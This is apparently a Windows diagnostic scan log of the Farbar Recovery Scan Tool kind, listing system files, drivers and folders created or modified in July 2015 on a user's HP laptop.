2015-07-16 10:36 - 2015-03-19 23:49 - 00309760 _____ (Microsoft Corporation) C:\WINDOWS\system32\compstui.dll
2015-07-16 10:36 - 2015-03-19 23:08 - 00477184 _____ (Microsoft Corporation) C:\WINDOWS\system32\puiobj.dll
2015-07-16 10:36 - 2015-03-19 22:37 - 00367104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\puiobj.dll
2015-07-16 10:36 - 2015-03-19 22:07 - 01091072 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2015-07-16 10:36 - 2015-01-28 21:04 - 00864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
2015-07-16 10:31 - 2015-03-03 21:32 - 00172544 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Input.Inking.dll
2015-07-16 10:31 - 2015-03-03 21:12 - 00141824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Input.Inking.dll
2015-07-16 10:30 - 2015-03-01 21:43 - 00222208 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastapi.dll
2015-07-16 10:30 - 2015-03-01 21:21 - 00207872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastapi.dll
2015-07-16 10:30 - 2015-01-29 20:53 - 02819584 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers.dll
2015-07-16 10:30 - 2014-11-14 02:58 - 00116736 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsDatabase.dll
2015-07-16 10:16 - 2015-04-01 18:22 - 02985984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll
2015-07-16 10:16 - 2015-04-01 18:20 - 04417536 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll
2015-07-16 10:16 - 2015-03-31 23:45 - 01491456 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbghelp.dll
2015-07-16 10:16 - 2015-03-31 22:31 - 01207296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll
2015-07-16 10:16 - 2015-03-12 21:11 - 02162176 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
2015-07-16 10:16 - 2015-03-12 20:39 - 01812992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRH.dll
2015-07-16 10:16 - 2015-02-05 16:24 - 01113920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2015-07-16 10:16 - 2015-01-29 23:01 - 00097792 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidbth.sys
2015-07-16 10:16 - 2015-01-29 22:02 - 00102912 _____ (Microsoft Corporation) C:\WINDOWS\system32\eappgnui.dll
2015-07-16 10:16 - 2015-01-29 21:40 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eappgnui.dll
2015-07-16 10:16 - 2015-01-29 21:37 - 00331776 _____ (Microsoft Corporation) C:\WINDOWS\system32\eapp3hst.dll
2015-07-16 10:16 - 2015-01-29 21:29 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\atlthunk.dll
2015-07-16 10:16 - 2015-01-29 21:24 - 00339456 _____ (Microsoft Corporation) C:\WINDOWS\system32\eapphost.dll
2015-07-16 10:16 - 2015-01-29 21:24 - 00250880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eapp3hst.dll
2015-07-16 10:16 - 2015-01-29 21:16 - 00266752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eapphost.dll
2015-07-16 10:16 - 2015-01-29 21:08 - 00346112 _____ (Microsoft Corporation) C:\WINDOWS\system32\eappcfg.dll
2015-07-16 10:16 - 2015-01-29 21:06 - 00278016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eappcfg.dll
2015-07-16 10:16 - 2014-12-11 22:04 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWbPrxy.exe
2015-07-16 10:16 - 2014-12-05 23:17 - 00360448 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncsi.dll
2015-07-16 10:16 - 2014-12-05 21:41 - 00391680 _____ (Microsoft Corporation) C:\WINDOWS\system32\nlasvc.dll
2015-07-16 10:14 - 2015-03-12 22:02 - 00316416 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\udfs.sys
2015-07-16 10:14 - 2014-11-04 15:25 - 00059712 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\kbdclass.sys
2015-07-16 10:14 - 2014-11-04 15:25 - 00051008 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mouclass.sys
2015-07-16 10:14 - 2014-11-04 02:55 - 00026112 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sermouse.sys
2015-07-16 10:14 - 2014-11-04 02:54 - 00108544 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\i8042prt.sys
2015-07-16 10:14 - 2014-11-04 02:54 - 00032256 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\kbdhid.sys
2015-07-16 10:14 - 2014-11-04 02:54 - 00030208 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mouhid.sys
2015-07-16 10:13 - 2015-04-08 18:41 - 00158720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rgb9rast.dll
2015-07-16 10:13 - 2015-04-02 20:35 - 00445440 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoMetadataHandler.dll
2015-07-16 10:13 - 2015-04-02 20:14 - 00364544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoMetadataHandler.dll
2015-07-16 10:10 - 2015-06-29 18:43 - 00026288 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2015-07-16 10:10 - 2015-06-29 11:07 - 01145856 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2015-07-16 10:10 - 2015-06-29 11:07 - 00764928 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2015-07-16 10:10 - 2015-06-29 11:07 - 00433152 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2015-07-16 10:10 - 2015-06-29 11:07 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2015-07-16 10:10 - 2015-06-26 19:21 - 00726528 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2015-07-16 10:10 - 2015-06-26 19:21 - 00227328 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepdu.dll
2015-07-16 10:10 - 2015-05-21 09:08 - 00193536 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2015-07-16 10:09 - 2015-04-08 18:55 - 00410128 _____ (Microsoft Corporation) C:\WINDOWS\system32\services.exe
2015-07-16 10:09 - 2014-12-19 02:26 - 00140800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys
2015-07-16 10:08 - 2015-03-12 22:58 - 00259072 _____ (Microsoft Corporation) C:\WINDOWS\system32\pku2u.dll
2015-07-16 10:08 - 2015-03-12 22:37 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\pku2u.dll
2015-07-16 10:08 - 2015-01-19 14:42 - 01487976 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
2015-07-16 09:54 - 2015-04-09 20:40 - 01249280 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll
2015-07-16 09:54 - 2015-04-09 20:17 - 01018880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll
2015-07-16 09:44 - 2015-04-16 02:17 - 00325464 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBXHCI.SYS
2015-07-16 09:37 - 2015-06-10 23:49 - 01380600 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32.dll
2015-07-16 09:37 - 2015-06-10 12:13 - 01097216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll
2015-07-16 09:37 - 2015-04-01 00:21 - 00337408 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchProtocolHost.exe
2015-07-16 09:37 - 2015-04-01 00:18 - 00468480 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssph.dll
2015-07-16 09:37 - 2015-04-01 00:17 - 00248832 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssphtb.dll
2015-07-16 09:37 - 2015-04-01 00:08 - 00774144 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssvp.dll
2015-07-16 09:37 - 2015-03-31 23:46 - 03633664 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2015-07-16 09:37 - 2015-03-31 23:17 - 02551808 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll
2015-07-16 09:37 - 2015-03-31 23:17 - 00903168 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchIndexer.exe
2015-07-16 09:37 - 2015-03-31 22:53 - 00391680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssph.dll
2015-07-16 09:37 - 2015-03-31 22:53 - 00272896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchProtocolHost.exe
2015-07-16 09:37 - 2015-03-31 22:45 - 02749952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2015-07-16 09:37 - 2015-03-31 22:45 - 00699392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssvp.dll
2015-07-16 09:37 - 2015-03-31 22:14 - 01920000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2015-07-16 09:37 - 2015-03-31 22:12 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchIndexer.exe
2015-07-16 09:37 - 2015-02-24 04:32 - 00991552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2015-07-16 09:37 - 2015-01-29 14:45 - 01763352 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2015-07-16 09:37 - 2015-01-29 14:34 - 01488040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2015-07-16 09:37 - 2014-12-11 01:36 - 00046456 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockScreenContentServer.exe
2015-07-16 09:36 - 2015-06-16 01:36 - 01661576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2015-07-16 09:36 - 2015-06-16 01:36 - 01212248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2015-07-16 09:36 - 2015-04-28 09:13 - 00513480 _____ C:\WINDOWS\SysWOW64\locale.nls
2015-07-16 09:36 - 2015-04-28 09:13 - 00513480 _____ C:\WINDOWS\system32\locale.nls
2015-07-16 09:36 - 2015-04-23 11:47 - 03084288 _____ (Microsoft Corporation) C:\WINDOWS\system32\msftedit.dll
2015-07-16 09:36 - 2015-04-23 11:16 - 02471424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msftedit.dll
2015-07-16 09:36 - 2015-03-05 23:08 - 02067968 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpdshext.dll
2015-07-16 09:36 - 2015-03-05 22:43 - 01969664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpdshext.dll
2015-07-16 09:36 - 2015-03-04 06:25 - 00377152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\clfs.sys
2015-07-16 09:36 - 2015-03-03 23:04 - 00075264 _____ (Microsoft Corporation) C:\WINDOWS\system32\clfsw32.dll
2015-07-16 09:36 - 2015-03-03 22:19 - 00058880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\clfsw32.dll
2015-07-16 09:36 - 2015-02-07 19:57 - 01090048 _____ (Microsoft Corporation) C:\WINDOWS\system32\MrmCoreR.dll
2015-07-16 09:36 - 2015-02-07 19:49 - 00791040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MrmCoreR.dll
2015-07-16 09:36 - 2015-01-27 21:31 - 00402432 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPhoto.dll
2015-07-16 09:36 - 2015-01-27 21:11 - 00357376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPhoto.dll
2015-07-16 09:35 - 2015-01-27 19:47 - 02501368 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2015-07-16 09:35 - 2015-01-27 19:41 - 02207488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2015-07-16 08:42 - 2015-06-28 01:07 - 00442712 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2015-07-16 08:42 - 2015-06-28 01:07 - 00178008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys
2015-07-16 08:42 - 2015-06-28 01:06 - 01311960 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcrt4.dll
2015-07-16 08:42 - 2015-06-28 01:06 - 00332120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2015-07-16 08:42 - 2015-06-27 12:42 - 00747520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpcrt4.dll
2015-07-16 08:42 - 2015-06-26 23:13 - 00202240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
2015-07-16 08:42 - 2015-06-26 23:12 - 00401408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2015-07-16 08:42 - 2015-06-26 23:12 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys
2015-07-16 08:42 - 2015-06-26 22:40 - 00445440 _____ (Microsoft Corporation) C:\WINDOWS\system32\certcli.dll
2015-07-16 08:42 - 2015-06-26 22:05 - 01441792 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2015-07-16 08:42 - 2015-06-26 22:00 - 00989184 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2015-07-16 08:42 - 2015-06-26 21:53 - 00324096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certcli.dll
2015-07-16 08:42 - 2015-06-26 21:26 - 00802816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2015-07-16 08:42 - 2015-03-30 01:47 - 00561928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2015-07-16 08:41 - 2015-05-30 17:18 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\system32\werdiagcontroller.dll
2015-07-16 08:41 - 2015-05-30 15:36 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2015-07-16 08:41 - 2015-05-30 15:35 - 00911360 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2015-07-16 08:41 - 2015-03-08 22:02 - 00057856 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthhfenum.sys
2015-07-16 08:41 - 2014-12-19 04:57 - 00788680 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2015-07-16 08:41 - 2014-12-19 04:25 - 00602776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00535640 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00531616 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00448792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00413248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Faultrep.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00372408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Faultrep.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00108944 _____ (Microsoft Corporation) C:\WINDOWS\system32\EncDump.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00038264 _____ (Microsoft Corporation) C:\WINDOWS\system32\WerFaultSecure.exe
2015-07-16 08:41 - 2014-12-08 15:42 - 00033584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WerFaultSecure.exe
2015-07-16 08:41 - 2014-10-30 18:37 - 00129536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\poqexec.exe
2015-07-16 08:41 - 2014-10-30 18:34 - 00146432 _____ (Microsoft Corporation) C:\WINDOWS\system32\poqexec.exe
2015-07-16 08:40 - 2015-05-02 20:39 - 00227328 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvc.dll
2015-07-16 08:38 - 2015-05-07 11:21 - 00522240 _____ (Microsoft Corporation) C:\WINDOWS\system32\GeofenceMonitorService.dll
2015-07-16 08:38 - 2015-05-07 11:05 - 00367104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GeofenceMonitorService.dll
2015-07-16 08:38 - 2015-04-09 20:34 - 02256896 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2015-07-16 08:38 - 2015-04-09 20:11 - 01943040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2015-07-15 16:18 - 2015-02-20 19:49 - 00780800 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsm.dll
2015-07-15 16:16 - 2015-04-24 22:25 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usb8023.sys
2015-07-15 14:11 - 2015-03-13 00:03 - 00239424 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2015-07-15 14:11 - 2015-03-13 00:03 - 00154432 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2015-07-15 11:02 - 2015-04-30 16:35 - 00124112 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll
2015-07-15 11:02 - 2015-04-30 16:35 - 00102608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2015-07-13 15:36 - 2015-07-13 15:36 - 00002233 _____ C:\Users\Richie\Desktop\HP Support Assistant.lnk
2015-07-10 18:12 - 2015-07-12 01:16 - 00000000 ___DC C:\WINDOWS\Panther
2015-07-10 18:12 - 2015-07-10 18:12 - 00000000 __SHD C:\Recovery
2015-07-10 18:08 - 2015-07-10 18:08 - 00262144 _____ C:\WINDOWS\system32\config\userdiff
2015-07-10 18:05 - 2015-07-10 18:05 - 00000000 ____D C:\Program Files\Reference Assemblies
2015-07-10 18:05 - 2015-07-10 18:05 - 00000000 ____D C:\Program Files\MSBuild
2015-07-10 18:05 - 2015-07-10 18:05 - 00000000 ____D C:\Program Files (x86)\Reference Assemblies
2015-07-10 18:05 - 2015-07-10 18:05 - 00000000 ____D C:\Program Files (x86)\MSBuild
2015-07-10 18:05 - 2015-07-10 18:05 - 00000000 ____D C:\inetpub
2015-07-10 18:03 - 2013-08-03 00:48 - 01166520 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll
2015-07-10 18:03 - 2013-08-03 00:41 - 00778936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationNative_v0300.dll
2015-07-10 15:59 - 2015-07-20 08:44 - 00000000 __SHD C:\Users\Richie\AppData\Local\EmieBrowserModeList
2015-07-10 15:59 - 2015-07-20 08:43 - 00000000 __SHD C:\Users\Richie\AppData\Local\EmieUserList
2015-07-10 15:59 - 2015-07-20 08:43 - 00000000 __SHD C:\Users\Richie\AppData\Local\EmieSiteList
2015-07-10 15:39 - 2015-07-29 20:41 - 00000000 ___RD C:\Users\Richie\OneDrive
2015-07-10 15:30 - 2015-07-10 15:30 - 00001442 _____ C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2015-07-10 15:28 - 2015-07-10 15:28 - 00000020 ___SH C:\Users\Richie\ntuser.ini
2015-07-10 15:20 - 2015-07-29 20:45 - 02085733 _____ C:\WINDOWS\WindowsUpdate.log
2015-07-10 15:19 - 2015-07-10 15:19 - 00022744 _____ C:\WINDOWS\system32\emptyregdb.dat
2015-07-10 14:53 - 2015-07-10 14:53 - 00001547 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2015-07-10 14:53 - 2015-07-10 14:53 - 00000000 ____D C:\Users\Default\Documents\hp.system.package.metadata
2015-07-10 14:53 - 2015-07-10 14:53 - 00000000 ____D C:\Users\Default User\Documents\hp.system.package.metadata
2015-07-10 14:46 - 2015-07-10 14:46 - 00000000 ____D C:\WINDOWS\system32\config\bbimigrate
2015-07-10 14:35 - 2015-07-27 20:13 - 00000000 ____D C:\Users\Richie
2015-07-10 14:35 - 2015-07-10 14:45 - 00000000 ___RD C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2015-07-10 14:35 - 2014-11-21 11:57 - 00000000 ___RD C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2015-07-10 14:35 - 2014-11-21 11:57 - 00000000 ___RD C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility
2015-07-10 14:35 - 2014-11-21 04:52 - 00000369 _____ C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pictures.lnk
2015-07-10 14:35 - 2014-11-21 04:52 - 00000369 _____ C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Documents.lnk
2015-07-10 14:35 - 2013-08-22 11:36 - 00000000 ____D C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2015-07-10 14:34 - 2015-07-10 15:20 - 00020958 _____ C:\WINDOWS\diagwrn.xml
2015-07-10 14:34 - 2015-07-10 15:20 - 00020958 _____ C:\WINDOWS\diagerr.xml
2015-07-10 14:21 - 2015-07-10 14:45 - 00012096 _____ C:\WINDOWS\iis.log
2015-07-10 14:21 - 2015-07-10 14:21 - 00930400 _____ C:\WINDOWS\SysWOW64\PerfStringBackup.INI
2015-07-10 14:16 - 2015-07-10 14:16 - 00000264 _____ C:\WINDOWS\Tasks\Synaptics TouchPad Enhancements.job
2015-07-10 14:16 - 2015-07-10 14:16 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2015-07-10 14:16 - 2015-07-10 14:16 - 00000000 ____D C:\Program Files\Realtek
2015-07-10 14:16 - 2015-07-10 14:16 - 00000000 ____D C:\Program Files\Common Files\ATI Technologies
2015-07-10 14:16 - 2015-07-10 14:16 - 00000000 _____ C:\WINDOWS\ativpsrm.bin
2015-07-10 14:15 - 2015-07-10 14:15 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_SynTP_01009.Wdf
2015-07-10 14:15 - 2015-07-10 14:15 - 00000000 ____D C:\Program Files\Synaptics
2015-07-10 12:07 - 2015-07-10 15:20 - 00006605 _____ C:\WINDOWS\comsetup.log
2015-07-08 08:00 - 2015-07-12 01:09 - 00000000 ____D C:\WINDOWS\system32\AutoUpdateLicense
2015-07-06 09:21 - 2015-03-04 03:26 - 00011105 ____N C:\WINDOWS\system32\AutoconfigV2.cab
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2015-07-29 20:45 - 2013-06-06 22:42 - 00003596 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-2321640021-2341620851-140482586-1002
2015-07-29 20:45 - 2013-06-06 20:08 - 00003922 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{3DBD3851-149E-4BFD-A49D-F9E67AA1E10F}
2015-07-29 20:44 - 2014-11-21 04:44 - 00956476 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2015-07-29 20:40 - 2013-08-22 09:25 - 00262144 ___SH C:\WINDOWS\system32\config\ELAM
2015-07-29 20:36 - 2014-11-21 04:34 - 00870466 _____ C:\WINDOWS\PFRO.log
2015-07-29 20:36 - 2013-08-22 10:46 - 00298488 _____ C:\WINDOWS\setupact.log
2015-07-29 20:36 - 2013-08-22 10:45 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2015-07-29 20:35 - 2013-08-22 09:25 - 01048576 ___SH C:\WINDOWS\system32\config\BBI
2015-07-29 20:00 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\sru
2015-07-28 17:09 - 2012-07-26 03:59 - 00000000 ____D C:\WINDOWS\CbsTemp
2015-07-28 13:20 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\vpnplugins
2015-07-28 13:17 - 2013-06-06 20:08 - 00000000 ____D C:\Users\Richie\AppData\Roaming\Adobe
2015-07-28 12:02 - 2013-09-27 22:11 - 00000000 ____D C:\WINDOWS\system32\MRT
2015-07-27 20:17 - 2013-08-22 10:44 - 00337808 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2015-07-27 19:02 - 2013-04-23 03:51 - 00000000 ____D C:\ProgramData\Norton
2015-07-27 18:55 - 2012-07-26 04:12 - 00000000 ___HD C:\WINDOWS\ELAMBKUP
2015-07-25 09:24 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\AppReadiness
2015-07-25 09:18 - 2013-06-06 20:03 - 00000000 ____D C:\Users\Richie\AppData\Local\Packages
2015-07-21 16:58 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\rescache
2015-07-20 08:44 - 2015-01-29 00:30 - 00020480 ___SH C:\Users\Richie\Desktop\Thumbs.db
2015-07-20 08:01 - 2013-08-22 11:36 - 00000000 ___RD C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2015-07-20 08:01 - 2013-08-22 11:36 - 00000000 ___RD C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2015-07-20 08:01 - 2013-08-22 11:36 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ___RD C:\WINDOWS\ToastData
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\WinStore
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\sr-Latn-RS
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\sr-Latn-CS
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\PolicyDefinitions
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ____D C:\Program Files\Windows Defender
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ____D C:\Program Files (x86)\Windows Defender
2015-07-20 08:00 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\system32\AdvancedInstallers
2015-07-18 11:03 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\NDF
2015-07-18 08:25 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\AppCompat
2015-07-17 10:52 - 2014-11-21 04:25 - 00000000 ____D C:\Program Files\Windows Journal
2015-07-17 09:50 - 2013-04-23 02:57 - 00000000 ____D C:\Program Files (x86)\ATI Technologies
2015-07-17 08:53 - 2014-11-21 11:56 - 00000000 ___SD C:\WINDOWS\system32\CompatTel
2015-07-13 17:10 - 2014-11-21 12:03 - 00792568 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2015-07-13 17:10 - 2014-11-21 12:03 - 00178168 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2015-07-13 15:37 - 2014-07-06 22:58 - 00000350 _____ C:\WINDOWS\Tasks\HPCeeScheduleForRichie.job
2015-07-13 15:36 - 2012-08-17 14:28 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP Help and Support
2015-07-13 15:36 - 2012-08-17 14:28 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2015-07-13 15:34 - 2012-08-17 14:00 - 00000000 ____D C:\Program Files (x86)\Hewlett-Packard
2015-07-13 15:30 - 2012-08-17 14:26 - 00000000 ____D C:\ProgramData\Hewlett-Packard
2015-07-13 15:29 - 2012-08-17 14:28 - 00000000 ____D C:\WINDOWS\System32\Tasks\Hewlett-Packard
2015-07-13 15:25 - 2012-08-03 20:02 - 00000000 ____D C:\SWSetup
2015-07-10 18:09 - 2013-08-22 11:36 - 00262144 _____ C:\WINDOWS\system32\config\BCD-Template
2015-07-10 18:05 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\SysWOW64\inetsrv
2015-07-10 18:05 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\inetsrv
2015-07-10 18:04 - 2014-11-21 05:16 - 00202240 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisRtl.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00168960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisRtl.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00063488 _____ (Microsoft Corporation) C:\WINDOWS\system32\ahadmin.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00055808 _____ (Microsoft Corporation) C:\WINDOWS\system32\admwprox.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00051200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\admwprox.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ahadmin.dll
